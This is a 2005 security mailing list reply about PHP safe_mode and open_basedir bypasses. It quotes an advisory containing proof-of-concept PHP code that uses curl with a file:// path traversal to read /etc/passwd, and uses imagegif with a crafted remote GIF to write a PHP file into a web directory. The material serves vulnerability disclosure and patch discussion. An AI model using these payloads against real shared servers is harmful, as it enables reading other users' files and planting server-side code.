In reguads to the the curl, I have just checked all the php curl code this was fixed in 4.3.10 from
what i can see, because i wrote a patch to stop the openbase dir in
curl until php fixed it, i submited it along time ago but the php dev's
were all "blah blah blah 3rd party software blah blah not our problem"
im not sure if theres a patch for the imagegif() as
i havent seen that one before.
----- Original Message -----
Sent: Tuesday, October 18, 2005 9:55
AM
Subject: [Full-disclosure] PHP Safedir
Restriction Bypass Vulnerabilities
with an image like http://81.57.125.106/~slythers/file.gif
<?php $im =
imagecreatefromgif("file.gif"); imagegif($im,
'/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php'); ?>
curl
openbasedir and safemode bypass. POC:
<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?"); $ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd
");
$file=curl_exec($ch);
echo $file;
?>
As you notice, we can bypass the safedir which leads to access to any files on any shared
servers.
This is fixed in the cvs.
_______________________________________________ Full-Disclosure - We
believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored
by Secunia - http://secunia.com/
|
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/